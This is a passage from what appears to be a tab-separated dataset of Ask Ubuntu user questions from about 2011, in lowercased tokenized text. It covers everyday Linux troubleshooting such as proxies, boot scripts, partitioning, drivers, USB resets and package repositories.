styles . it 's not much use for testing this issue . openoffice is better in that it shows the font families in the toolbar but shows all the styles in the text properties dialog . unfortunately this code appears to be buggy ; changing the style to anything other than the basic bold and italic did n't work . scribus treats fonts properly . after running fc-cache scribus worked perfectly .
23201	priority for http over ssh on server	my file server on the internet runs openssh , where users upload and download files using scp or winscp . at the same time , the server runs some web applications ( http ) , which need higher priority . is there a way to give http priority over ssh file transfer ? if not , can i limit ssh bandwidth for incomming connections ?
23211	how do i add a repository from behind a proxy ?	hi i 've a problem at the office . we 're behind a proxy ( which is set and applied at ubuntu proxy settings ) and when i try to add a repository from terminal , i get : error reading -- some url here -- : urlopen error [ errno 113 ] no route to host i 've tried with launchpad-getkeys script . i get this ( image ) i 've tried with another `` hack '' , without luck press alt-f2 and type gksu gedit /usr/lib/python2.6/dist-packages/softwareproperties/ppa.py find line 88 , change keyserver.ubuntu.com to hkp : //keyserver.ubuntu.com:80 save , close and reboot . does anyone know if i could solve this problem in any way ? thanks
23215	how to install ubuntu-restricted-extras without ttf-mscorefonts-installer	i want to install the restricted codecs to enable .mp3 playback and so on , in totem , i attempted to install the metapackage , ubuntu-restricted-extras but it wants to install the ttf-mscorefonts-installer package . i do not want to do this , the installer takes too long as it has to download the font archives and install them , i tried to use the ubuntu-restricted-addons package but it says i should not install it , i should install ubuntu-restricted-extras instead . should i just find what packages are contained in the restricted-extras and install those individually or is there a way to left something out of a metapackage during install ?
23224	rc.local is not always executed upon boot	hey , i have some weird problem with the rc.local file which is located in /etc/rc.local the thing is that it is not always running when i boot up the laptop . maybe every second time , i have n't counted . anyway when that happens i have to manually go to terminal and type sudo /etc/init.d/rc.local start , which kinda kills the purpose of having this script . anyone know what the problem could be ? edit since this was n't obvious . this is an issue where i make a fresh boot up . which mean i have shut down the computer . and next time when i boot up the computer , the rc.local file is randomly deciding whether it will automatically start or not . here 's a copy of what my rc.local file contains echo -n 255 > /sys/devices/platform/i8042/serio1/serio2/sensitivity echo level 2 > /proc/acpi/ibm/fan touch /home/starcorn/desktop/foo rfkill block bluetooth exit 0
23226	good specialized xml editor for kml editing or plugin for gedit	i frequently have to edit .kml ( google earth ) files , these can get really hard to deal with in an ordinary editor , and i need a little more than syntax highlighting , i need to be able to validate the .kml before opening in ge . someone recommended jedit to me for this but i find it a bit sluggish and hard to configure to work properly with .kml , any recommendations ? a plugin for gedit perhaps ? maybe something for emacs , yes i use emacs too .
23227	how to use one recipe to create packages for different ubuntu series ( trouble with ./debian/changelog ) ?	the launchpad 's beta feature allows to create ubuntu packages using recipes . i got them to work , and i am now able to use them for packaging my project . however , i have little trouble with the ./debian/changelog file . i need to fill it in with a distribution name ( [ package name ] ( [ version ] ) [ distribution ] ; [ urgency ] ) . let 's say i put `` maverick '' there . then i request a build using the recipe . i choose to build it both for maverick and natty . as the result , the natty package in tha ppa will have it 's `` distribution '' field set to `` maverick '' , which looks invalid ( actually , it seems only the changelog will have this incorrect information , but i got aware of that fact , when the notification e-mail i got stated my package was released for natty , but it also said : `` distribution : maverick '' ) . it this ok ? i am not even sure whether it is incorrect , but if it is , then how do i use the recipe , to build a package for many ubuntu series , using one changelog file ?
23230	how do i mount a windows live skydrive account as a partition ?	is there any software or steps to mount windows live skydrive so that we can upload files easily .
23233	gparted ca n't create ext3 or ext4 partitions	i have a 60gb drive in a dell latitude d600 . it all started with trying to install 10.10 as a dual boot . first installation failed at the partitioning stage , next i tried manual partition that also failed . i finally went to gparted livecd to see what i could do . it allows me to shrink the ntfs , create a swap partition , create a partition in the remaining space . if however i try to format the empty partition as ext3 or ext4 it fails , the drive disappears from gparted and i have to reboot . when i come back in , the blank space is there with no file system . if i try to format the new partition in ntfs or fat32 ( as a test ) it works fine and windows can see it . i even tried creating a fat32 partition , doing and ubuntu install to that disk , allocating almost all of it to ubuntu ( thinking i could use the small remainder as a shared disk ) , it started the install but failed after several minutes of copying with a warning about can not fsync ( something ) and something about rw problems . ( clarification because based on comments i thoroughly confused the issue , i did n't actually try to install to the fat32 , i just thought that it was odd that gparted was successful in creating it , so kept the fat32 which i thought was ok then let the installer shrink it and do whatever it wanted which was of course creating a ext4 beside the shrunken partition . this was an academic exercise since nothing was working anyway and thank all for pointing out my mistaken wording ) at this point i ca n't install ubuntu because there seems to be now way to create a suitable partition .
23234	remove unknown parameter in initramfs	i was changing the value in the initramfs and i mistype the word.. so every time boot up my ubuntu show `` unknown parameter '' . how can fix it ? how to remove this parameter ? tq
23238	how can i find what video driver is in use on my system ?	i know that sometimes i have the option to change my video display driver , and i can access this functionality by using system→administration→additional drivers . but what 's the simple way to see what driver my ubuntu 10.04 or 10.10 system is using currently ? update -- i found a command i did n't know about in how to determine version and origin of proprietary drivers . jockey-text -l martin owens gives this example output : kmod : nvidia_current - nvidia_current ( proprietary , enabled , not in use ) pkg : sl-modem-daemon - software modem ( proprietary , disabled , not in use ) kmod stands for kernel module , pkg is obviously an apt package . according to the code , jockey installs the latest candidate package and ignores any detectable kernel modules or blacklisted modules . the output is more descriptive than that from lshw by itself , but i think it is limited to giving information about drivers that were installed with jockey in the first place . jockey , launched as jockey-gtk , is ( i believe ) the same application that runs when you select system→administration→additional drivers .
23245	webkit release and dependencies	i am using webkit for navigating web pages and rendering ui in my application . i wanted to know the dependencies of webkit with new kernel modules . how to find out that the particular version of webkit will work with all kernel versions ? how to come to know about the new releases of webkit and the kernel modules supported by this version ?
23246	how do i edit the ssh motd ?	i would like to add some fields to the ssh motd . motd today : linux toker 2.6.31-22-generic-pae # 69-ubuntu smp wed nov 24 09:04:58 utc 2010 i686 to access official ubuntu documentation , please visit : http : //help.ubuntu.com/ system information as of tue jan 25 19:25:53 cet 2011 system load : 0.23 processes : 139 usage of / : 76.8 % of 911.20gb users logged in : 1 memory usage : 17 % ip address for eth0 : 192.168.1.102 swap usage : 0 % graph this data and manage this system at https : //landscape.canonical.com/ 38 packages can be updated . 38 updates are security updates . no mail . last login : tue jan 25 19:22:06 2011 from 192.168.1.106 i know that i could change this to a static message by pointing /etc/motd to something else than /var/run/motd but i do not want to loose the generated data that is presented today . is it possible to add the disk usage off two additional hard drives to the message that is generated by default ? for example : linux toker 2.6.31-22-generic-pae # 69-ubuntu smp wed nov 24 09:04:58 utc 2010 i686 to access official ubuntu documentation , please visit : http : //help.ubuntu.com/ system information as of tue jan 25 19:25:53 cet 2011 system load : 0.23 processes : 139 memory usage : 17 % users logged in : 1 swap usage : 0 % ip address for eth0 : 192.168.1.102 usage of / : 76.8 % of 911.20gb usage of /media/hddb/ : 8 % of 1.8t usage of /media/hddc/ : 16 % of 1.8t graph this data and manage this system at https : //landscape.canonical.com/ 38 packages can be updated . 38 updates are security updates . no mail . last login : tue jan 25 19:22:06 2011 from 192.168.1.105
23247	command to open a program that does n't come with ubuntu ?	i know that i can use the command firefox to open firefox but i would like to open chromium . how to archieve that ?
23253	quickcam e 3500 working from cheese , but not skype	i have a logitech which i remember to be working fine from skype some releases , ago , since lucid it is not functional from skype . the /dev/video0 from the webcam shows up on the skype device list but the test function procudes no results . it works fine from cheese so it 's not a kernel driver issue , any idea on what could be the problem for skype ?
23254	how hard would it be to merge unity & gnome-shell ?	i do n't think that it 's good for the linux desktop to be too fragmented , forks should rejoin the main projects and thus make linux a better experience . so if at some point in the future the community / canonical has to decide between unity and gnome-shell how hard would it be to merge the two projects ?
23257	can 'avahi ' handle ip address lookups as well as host name lookups ?	ubuntu uses 'avahi ' to perform host name lookups on the local network , which allows me to find other computers just by adding '.local ' to the name , e.g . laptop.local or desktop.local . however , avahi does not seem to perform reverse lookups for the ip addresses of computers on the local network . so when applications look up ip addresses for local computers , a request goes out to an internet dns server on the internet which returns nxdomain ( name does not exist ) . is it possible for avahi to perform reverse lookups for ip addresses ? if it is , how do i do it ?
23258	will ubuntu oneconf be avaible in 11.04 ?	will oneconf be in the next release ? ( integrated into ubuntu software center , i mean ) because the launchpad blueprint whiteboard reads : postpone default integration into ubuntu because of synchronization in desktopcouch is failing for a lot of users . prefer to delay one cycle to let ubuntuone guys working on that and having a sweet oneconf into natty !
23263	recover ubuntu grub without livecd - ca n't boot with ubuntu livecd after install windows	i installed windows after installing ubuntu . but ubuntu is still intact in its partition . i 'm trying to run the ubuntu livecd to recover grub , but the livecd no longer works . it stops the boot process and does not load completely . i can not run ubuntu in live mode to recover grub . is there any way to recover the grub/grub2 without the livecd ? edit : [ important ] i 've downloaded a new ubuntu 10.10 iso . i also did the md5 check . it 's all right . then , i recorded this .iso and still can not load the livecd to the end .
23264	how do i organize an ubuntu party or get together ?	i would like organize some ubuntu party with my school , but how to improve ubuntu with our time ? ( easily )
23270	temperature indicator for gnome panel	is there an indicator ( a.k.a applet , launcher ) that i can embed to my gnome panel which shows my cpu , gpu , hdd etc . temperatures ?
23272	is there a way to determine how to launch any program from the command line	even if there is n't a cli interface . i would like to be able to launch it/ kill it from command line .
23274	connect to a microsoft exchange 5.5 server using evolution	i am trying to set up evolution to connect to my company 's exchange server , but i got this error after entering the request owa url and credentials : the exchange server is not compatible with exchange connector . the server is running exchange 5.5 . exchange connector supports microsoft exchange 2000 and 2003 only . i read that i can use thunderbird or imap if it 's enabled , but that i 'd lose calendar and contacts sync . i 'd rather not do that . is there a workaround for this so that i can get roughly the same functionality i 'd get using outlook for windows ?
23275	if i downgrade gwibber , will it still work with twitter ?	i am considering returning gwibber to the version from the standard repo ( as opposed to the unstable ppa ) so i can use the me-menu again . however , i use twitter quite a bit , and i 'd hate to be hit with oauth problems . will this be safe ?
23276	2.6.37 ( or 2.6.36 ) ubuntu kernel in maverick . is this possible and where can i get it ?	is it possible to get a newer kernel with the ubuntu patches applied ( as a deb + related packages - such as headers , since this machine would be best not compiling the kernel for time restraints ) ? i 'd prefer a ppa , if one exists .
23282	how can i connect to my amazon ec2 server using a desktop client	i 've already setup an amazon ec2 instance running 10.10 and am able to connect to it using the ssh command provided by amazon . i noticed there is a 'terminal server client ' and a 'remote desktop viewer ' included with ubuntu , and i was wondering if it 's possible to use either of these to connect to my server . it would be a far more convenient than typing out the rather long ssh command ( after first navigating to the directory in which my key is stored ) . i 've had a few tries at connecting with both of them , but the problem is i do n't know what i should be putting in the fields since all the documentation provided by both amazon and ubuntu assume i already know what i 'm doing with servers . update : from reading the answers it seems i 've left out a crucial piece of information . i wish to administer my server using a terminal . my question is about making the connection process as simple as possible .
23287	what can i use to automate backups of gmail ?	i 'd like to automate the process of locally backing up my gmail account , and am looking for a solution that : can be scheduled to run in the background does not cause messages to be marked as read what resources are available for doing this in ubuntu ?
23288	what problems i may face during upgrade due to removal of following packages ?	i have remove ubuntuone , empathy , evolution and gwibber completely from my system ? in synaptic , these are shown as recommended , so i am worried if i will be having any problem to upgrade to natty due to this ?
23297	what are the alternatives to network manager for wireless ?	i was wondering if there are any gui alternatives to the network manager . it seems , i always run into problems with it ( unstable connections , wrong icon shown , wrong notifications , etc . ) .
23301	do not like unity , asking for options	possible duplicates : is there an application to remove unity ui ? will you have option to remove unity in 11.04 ? will it be possible to use the actual gnome ui once ubuntu 11.04 will be available ? moving from ubuntu netbook to ubuntu desktop either one of these : i need an option to use desktop ui instead of unity while installing ubuntu netbook 10.10 . i need an application to remove unity after the ubuntu netbook 10.10 is installed , without doing it manually . is there an easy way to do that ? i did try manually but had problems . it is not a deal for experienced users like many of you here , but a big issue to a new one like me . i hope those clever programmers of unity not force me to use their ui .
23305	is there any way of adding chinese characters to autokey ?	each time i add chinese characters to autokey and set an autokey . the just do n't show up in the output . does anyone know a way of including them ?
23306	is there any application that stores information of clipboard and you can retrieve them with an hot key ?	something like autokey but an application that directly stores the data to the clipboard .
23307	how can i hard reset a usb device ?	i have a usb device ( a modem ) that is really finicky . sometimes it works fine , but other times it refuses to connect . the only solution i have found to fix it once it gets into a bad state is to physically unplug the device and plug it back in . however , i do n't always have physical access to the machine it is plugged in on , so i 'm looking for a way to do this through the command line . this post suggests running : sudo modprobe -w -r usb_storage ; sudo modprobe usb_storage however i get an `` unknown option -w '' output . this slightly modified command : sudo modprobe -r usb_storage fails with the message fatal : module usb_storage is in use . if i try to kill -9 the processes marked [ usb-storage ] before running they refuse to die ( i think because they are deeply tied to the kernel ) . anyone know of a way to do this ? note : i cross-posted this on superuser.com as i did n't know which was more appropriate . i will delete and/or link whichever one is answered first .
23310	why do the interfaces show ipv6 address along with ipv4	i have manually specified only ipv4 address for my interfaces . but all the interfaces automatically show inet6 address as well . does it mean that ubuntu starts an ipv6 tunnel by default . if it does , is n't it dangerous , as ipv6 assigns public ips for all lan clients . i only have a firewall on my nat router , and my clients , who 's interfaces show ipv6 address , do not have firewalls . here is a screenshot : eth0 link encap : ethernet hwaddr 34 : dc:47:2e : ad:13 inet6 addr : fe80 : :28cf:38ff : fb7b : da19/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5783 errors:0 dropped:0 overruns:0 frame:0 tx packets:6098 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:1000 rx bytes:2961324 ( 2.9 mb ) tx bytes:1573757 ( 1.5 mb ) interrupt:46 note : for privacy reasons i have modified the hwaddr and inet6 addr values .
23311	use real browser instead of w3m on ssh connections	i am using ubuntu as desktop and server os . when i am logged in to the server via ssh on terminal and have to view a web-page ( localhost ) on the server i use w3m ( w3m localhost ) . unfortunately w3m is not that easy to handle , as the page has some big menus and uses jquery . so i am wondering if it is possible to use a browser on my desktop to connect to the server via ssh with a real browser ( firefox or chrome ) . basically it would require to connect with a browser on my desktop to the server over ssh with username and password , and open on that server localhost . is this possible by default , or are there any add-ons for firefox/chrome ? i would prefer firefox .
23312	which daemons can be stopped from loading at boot time ?	below is list obtained from chkconfig utility . i want to know that which of these daemons can be stopped safely without losing any additional features ? acpi-support 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off acpid 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off alsa-mixer-save 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off anacron 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off apache2 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off apparmor 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on apport 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off atd 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off atieventsd 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off avahi-daemon 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off binfmt-support 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off bluetooth 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off bootlogd 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off brltty 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on clamav-daemon 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off clamav-freshclam 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off console-setup 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off cron 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off cups 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off dbus 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off dmesg 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off dns-clean 0 : off 1 : on 2 : on 3 : on 4 : on 5 : on 6 : off failsafe-x 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off fancontrol 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off gdm 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off grub-common 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off hostname 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off hwclock 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off hwclock-save 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off irqbalance 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off jetty 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off kerneloops 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off killprocs 0 : off 1 : on 2 : off 3 : off 4 : off 5 : off 6 : off lm-sensors 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on module-init-tools 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off mysql 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off network-interface 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off network-interface-security 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off network-manager 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off networking 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off ondemand 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off pcmciautils 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on plymouth 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off plymouth-log 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off plymouth-splash 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off plymouth-stop 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off pppd-dns 0 : off 1 : on 2 : on 3 : on 4 : on 5 : on 6 : off procps 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off pulseaudio 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off rc.local 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off rcs 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off rsync 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off rsyslog 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off saned 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off screen-cleanup 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off sendsigs 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off speech-dispatcher 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off stop-bootlogd 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off stop-bootlogd-single 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off sudo 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off tmux-cleanup 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on udev 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off udev-finish 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off udevmonitor 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off udevtrigger 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off ufw 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off umountfs 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off umountnfs.sh 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off umountroot 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off unattended-upgrades 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off urandom 0 : on 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on vboxdrv 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off vboxweb-service 0 : off 1 : off 2 : on 3 : on 4 : on 5 : on 6 : off x11-common 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off s : on
23314	how to switch to netbook edition	i am running only one operating system - the latest version of ubuntu . ( i just broke my windows xp addiction for the first time a few days ago . ) but i am having some problems with the size of some windows . my computer is an acer aspire one netbook . so i think it is better for me to switch to the ubuntu netbook edition . what is the most painless way to do this switch ? do i have to treat this like an entirely new system ? or is there some simpler way for me to swtich/ugrade , especially now that i am already running ubuntu ? please help . thanks !
23315	second monitor remains black after installing nvidia 270.18 driver	i 've installed the latest nvidia 270.18 driver from the ~ubuntu-x-swat ppa . since the driver has been installed my second monitor remains black . in nvidia-settings the second monitor is detected correctly , but i could n't get the second monitor to display anything . i can move any windows or the mouse cursor to the second monitor , but i ca n't see anything on the second monitor . ideas ?
23321	which 1seg tv tuner is supported ? ( mobile isdb-t )	the 1seg protocol allows japanese and brazilian cellphones to show television . there are many usb-stick 1seg tuners for sale , to watch tv on pc . is any of them usable with ubuntu ?
23322	a pdf viewer supporting synctex for gnome	i am looking for a pdf viewer for working with latex and synctex ( forward and inverse search ) under gnome . i know from previous questions in various forums that okular has this feature , but i prefer not to drag kde dependencies just for this . is there an alternative that would work nicely in gnome , without too many dependencies ? i do n't mind using ppas , building from source , using old x-style tools or writing small scripts - but i need something that is known to work and wo n't clutter my setup too much .
23330	ways to enter special characters ? is alt+numpad possible ?	i know there 's this question how can i type special characters like ăť ? , but i 'd like to know if there is any possibility to configure the keyboard to use windowish style to insert special characters ( alt+code in numpad ) . i know it can be done with ctr+shift+u+code but ... i have to enable ibus and do n't know how to leave it enabled by default hex codes are longer than decimal ones ctrl+shift+u+hex codes combos are longer than the alt+decimal code ones as an ex-windows ( tm ) user , i 'm so used to it ... . two examples of characters i use a lot , comparing win style and gnome-style tilde ( ~ ) character windows - > alt+1-2-6 gnome - > ctrl+shift+u+7-e superscript 2 - square ( â˛ ) character windows - > alt+2-5-3 gnome - > ctrl+shift+u+b-e if you try those 'key combos ' , the windows style is easier to type ( not being subjective : less fingers used simultaneously , less keys pressed ) . as i do n't want to put it in some subjective way , my question would be it i can configure the keyboard to use alt+numpad style , or if i need to stick to the ctrl+shift+u combo ( or the compose key alternative )
23331	unable to dual-boot windows 7 and kubuntu 10.10	i have installed windows 7 and kubuntu 10.10 , but the boot menu is n't displayed , and the computer boots into windows 7 directly . how to fix this ?
23332	apt-get update error for a personal repository	i have a personal repository setup using reprepro . everything works allright . apt-get update reads the package list from the repository and i can install packages from the repository . a few annoying error messages are printed though and i ca n't figure out how to resolve them ( domain name removed ) : get:1 http : //xxxxxx/packages/ maverick/multiverse translation-en [ 3,401b ] 99 % [ 1 translation-en bzip2 0b ] [ waiting for headers ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . ign http : //xxxxxx/packages/ maverick/multiverse translation-en get:4 http : //xxxxxx maverick release [ 1,243b ] 60 % [ 3 translation-en_us bzip2 0b ] [ 4 release gpgv 1,243b ] bzip2 : ( stdin ) is not a bzip2 file . is this a problem with the way the repository is setup using reprepro or is this a local apt-get problem ? these are the releavant parts of the reprepro distributions file : suite : stable codename : maverick version : 10.10 architectures : i386 signwith : yes components : multiverse debindices : packages release . .gz .bz2 udebindices : packages . .gz .bz2 dscindices : sources release .gz .bz2 deboverride : override.maverick udeboverride : override.maverick dscoverride : override.maverick
23338	is ubuntu doing gui research ?	is there any serious graphical user interface research for ubuntu ? i mean , are there any improvements planned by ubuntu in order to improve it 's default user interface ? just for example i do n't understand why are there two upper bars on every window , menu and controls like close , minimize , maximize , when the title is not very useful .
23339	vpn connection breaks internet	after installing openvpn properly ( network-manager-openvpn ) and setting up my vpn , i am not able to connect to any internet page or access anything that 's remote . pinging stuff is totally dead . i have absolutely no idea on how to proceed from now . what should i do ?
23347	can not install glib-dev	i tried to build dasher , but i got it needs glib . so doing so this came up : checking for glib ... configure : error : package requirements ( glib-2.0 > = 2.6 ) were not met : no package 'glib-2.0 ' found so i tried to install libglib2.0-dev it gave another error : libglib2.0-dev : depends : libglib2.0-0 ( =2.26.0-0ubuntu1 ) but 2.26.1-0ubuntu1 is to be installed depends : libglib2.0-bin but it is not going to be installed what shall i do ?
23348	do i need to install japanese truetype font , ume-font	i have an english ubuntu . today suddenly the update manager asks me to download 48 mb of `` japanese truetype font , ume-font '' . it says it is a new install . do i really need this for something ? i can not imagine why i need japanese fonts . this is the package that i am being 'forced ' to install : http : //packages.ubuntu.com/maverick/fonts/ttf-umefont it is listed under distribution updates .
23353	ubuntu boots into terminal	when i turn on my computer ( a cr-48 ) , i keep loading tty1 . i have tried xstart , and all i get is : fatal server error : could not create lock file in /tmp/.tx0-lock when i attempted to make the directory ( both sudo and not ) , i received these two errors : sudo : ca n't open /var/lib/sudo/don/tty2 : read-only file system ( i 've gotten other tty 's for different virtual terminals ) mkdir : can not create directory '/tmp/tx0-lock ' : read-only file system before i got to the only terminal state , i had the computer moving a few files from a network server to the computer , i put it to sleep without stopping the transfers , and started the computer again away from my home network , and attempted to stop the transfers , the computer than restarted . running sudo reboot puts me right back in the virtual terminal , and i ca n't get into any sort of x application .
23355	is there an additional set of information that references more than the man page ?	in reading some the questions i find some commands i am not familiar with . i will run a man page on the command and reference the other questions entry to get a better understanding of the command . one was about using chkconfig . sometimes the command line i reference has a switch that is not referenced in the man page . my question is am i missing something or is there an additional set of information that references more than the man page ? here is an example : chkconfig -- level 3 squid off -- level is not listed in the man page . using the man i would 've used chkconfig -- edit and worked it that way . clearly using -- level would be the better choice in this instance but it is not listed as a choice in the man page .
23364	how do i delete all my ubuntu one contacts ?	i want to sync my new cell phone contacts but i want to erase all the contacts that i have in my ubuntu one account first . i use android 2.2 on my phone , on the application i select just to upload contacts but its not doing that , it is replacing the one i have on my cell .
23371	how to hide unwanted updates ?	i was wondering for quite some time now ; is there any way to hide/remove any unwanted updates when i see some in the ubuntu update manager ?
23373	how to view files from host ? ( running inside vmware fusion )	i have just finished moving my development server into a ubuntu 10.04 server vm in vmware fusion 3 . i have all of my mysql and tomcat stuff running and am now trying to connect to my actual site files which are stored on my mac under / { user root } /workspace/coldfusion/ . i know that normally you should be able to setup a shared folder in vmware and find it under /mnt/hgfs/ { share name } , but i ca n't find it . i am not sure if i have to manually mount it or what .
23379	reading photoshop psd files with layers	( there are a few existing questions on photoshop alternatives , but none seem to focus on reading psd files specifically ) say i 'm a programmer working with a web designer and would like to implement a design she 's produced as a psd file using photoshop . it 's a fairly complicated design using overlays/animating layers , so the ability to examine the psd file and turn individual layers on and off is necessary . is there an app available in ubuntu that can read psd files created by photoshop ? alternatively , is there a more linux-friendly file format that photoshop can export to and still preserve layers ?
23381	installation of driver from ati-driver-installer-10-12-x86.x86_64.run	i have installed `` additional drivers '' but there is a problem with ati catalyst control centre : there is no ati graphics driver installed or it is not functioning properly i have downloaded the appropriate ati-driver-installer-10-12-x86.x86_64.run file from the ati site . what terminal commands do i need to use to install from this file ?
23388	installing couchdb 1.0.1	i have ubuntu server 10.04 and it comes with its own couchdb version 0.10 i am trying to upgrade this to 1.0.1 or at least install 1.0.1 on the side . no matter what i try , i ca n't seem to be able to do it . things i have tried are below : sudo apt-get install couchdb ( installs something , but when i use curl to check on it , it gives me the welcome json with a version number 0.10 ) sudo apt-get upgrade couchdb ( installs a whole bunch of stuff , same result ) sudo apt-get remove couchdb ( somehow still running - also purged . now , i can curl to http : //127.0.0.1:5984 and get the welcome json , but couchdb is not installed any more i.e . typing in couchdb stop gives me a `` not installed '' error ) installed from the 1.0.1 binary , but after installation , it is not actually running - tested with netstat ) tried to change the port number in the local.ini file and tried to restart , but now ca n't figure out how to restart couchdb1.0.1 or even if it is actually running . in case i have n't made it abundantly clear , i am completely new to linux . i have some rudimentary experience with .htaccess and configuring apache and php but that 's it . if you can help me , i will be very grateful !
23390	update information is outdated	how can i fix my update problem . i am using maverick 10.10 and update daily , however i get the warning triangle that tells me that the update information is outdated . after i perform an update it tells me that it was last updated 26 days ago . upon looking at the sources list in /etc/apt/sources.list it shows the following : # deb cdrom : [ ubuntu 10.10 _maverick meerkat_ - release i386 ( 20101007 ) ] / maverick main restricted # see http : / /help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : // mirror01.th.ifl.net/ubuntu/ maverick main restricted deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mirror01.th.ifl.net/ubuntu/ maverick-updates main restricted deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mirror01.th.ifl.net/ubuntu/ maverick universe deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick universe deb http : //mirror01.th.ifl.net/ubuntu/ maverick-updates universe deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mirror01.th.ifl.net/ubuntu/ maverick multiverse deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick multiverse deb http : //mirror01.th.ifl.net/ubuntu/ maverick-updates multiverse deb-src http : //mirror01.th.ifl.net/ubuntu/ maverick-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //gb.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //gb.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu maverick partner # deb-src http : //archive.canonical.com/ubuntu maverick partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //mirror01.th.ifl.net/ubuntu/ maverick-security main restricted deb-src http : 